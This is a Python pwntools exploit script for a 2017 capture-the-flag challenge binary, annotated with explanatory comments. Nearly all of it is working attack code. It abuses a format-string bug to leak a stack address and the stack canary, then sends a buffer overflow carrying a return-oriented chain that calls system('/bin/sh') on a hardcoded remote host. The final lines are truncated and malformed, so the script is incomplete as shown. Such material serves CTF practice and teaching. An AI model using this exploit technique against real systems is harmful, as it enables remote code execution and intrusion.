#!/usr/bin/python
from pwn import *
# Toggle between a local copy of the challenge binary (True) and the
# competition's remote service (False).  ``target`` is bound in main().
LOCAL = False
def leak_stack():
    """Leak a stack pointer through the service's format-string bug.

    Sends menu choice "2" followed by the format specifier "%1$p"; the
    service echoes the first variadic argument as a pointer, which the
    author uses as a stack reference.  The reply is read up to the next
    menu banner and its first 16 characters are parsed as a hex literal.

    Returns:
        int: the leaked address.

    Raises:
        ValueError: if the 16-character window does not parse as hex
            (e.g. the reply is framed differently than the slice assumes).
    """
    log.info("leaking stack addr...")
    target.sendline("2")
    # "%1$p" coming back as a pointer is what shows the input reaches
    # printf() as the format string itself.  Defensively, printf("%s", buf)
    # and -Werror=format-security prevent this class of leak outright.
    target.sendline("%1$p")
    stack_addr = target.recvuntil("3. Exit the battle")
    # int(..., 16) accepts the "0x" prefix and strips whitespace, so the
    # 16-char window presumes the pointer is the very first thing in the
    # reply -- TODO confirm against the program's actual output layout.
    stack_address = int(stack_addr[0:16],16)
    return stack_address
def leak_canary():
    """Leak the stack canary through the same format-string bug.

    Sends menu choice "2" followed by "%23$p"; per the author's naming the
    23rd positional argument holds the stack-protector cookie for this
    binary (the slot number is binary-specific).  The reply is read up to
    the next menu banner and characters 2..19 are parsed as a hex literal.

    Returns:
        int: the leaked canary value.

    Raises:
        ValueError: if the slice does not parse as hex.
    """
    log.info("leaking canaries...")
    target.sendline("2")
    target.sendline("%23$p")
    stack_cookie = target.recvuntil("3. Exit the battle")
    # Note the window differs from leak_stack()'s [0:16]; both are tuned to
    # the exact framing of the service's reply -- presumably the canary
    # reply carries a two-character prefix.  TODO confirm.
    # A canary is only a mitigation while it stays secret; an info leak
    # like this one is exactly what defeats it.
    stack_cookies = int(stack_cookie[2:20],16)
    return stack_cookies
def pwn():
    """Leak the stack address and canary, send the overflow, go interactive.

    All gadget addresses and offsets below are specific to the author's copy
    of the challenge binary and cannot be verified from this file.

    Steps:
      1. leak_stack()  -> reference used to locate "/bin/sh;" in the payload
      2. leak_canary() -> value required to pass the stack-protector check
      3. send filler, the string, the canary, 8 more bytes, then a
         three-entry chain (pop rdi gadget, string address, system@plt)
    """
    # Fixed code addresses in the 0x400000 range are consistent with a
    # non-PIE x86-64 binary; PIE would force these to be leaked as well.
    pop_rdi = 0x0000000000400ab3
    system_plt = 0x00000000004006a0
    log.info("ASIS CTF 2017: mary_morton exploit - mphx2")
    target.recvuntil("3. Exit the battle")
    stack_address = leak_stack()
    log.info("stack found: %#x", stack_address)
    # Author-measured distance from the leaked pointer to where "/bin/sh;"
    # lands in the input buffer -- presumably found with a debugger; TODO confirm.
    bin_sh_stack = stack_address - 0x260d
    stack_cookies = leak_canary()
    log.info("canary found: %#x",stack_cookies)
    sleep(0.5)
    log.info("spawning /bin/sh")
    target.sendline("1")
    # Layout: 128 x "A" | "/bin/sh;" (8) | canary (8) | 8 bytes (presumably
    # the saved rbp slot) | pop_rdi | bin_sh_stack | system_plt.
    # The str + p64() concatenation presumes Python 2 (pwntools' p64 returns
    # bytes on Python 3, where this would raise TypeError); the shebang is
    # the unversioned interpreter.
    target.sendline("A"*128+"/bin/sh;"+p64(stack_cookies)+"AAAAAAAA"+p64(pop_rdi)+p64(bin_sh_stack)+p64(system_plt))
    target.interactive()
def main():
    """Open the connection selected by LOCAL and run pwn().

    Binds the module-level ``target`` global that leak_stack(),
    leak_canary() and pwn() all read.
    """
    global target
    # Local process for testing against a copy of the binary, otherwise the
    # competition's remote service.
    target = process("./mary_morton") if LOCAL else remote("146.185.132.36",19153)
    pwn()
if __name__ == "__main__": | |
main( |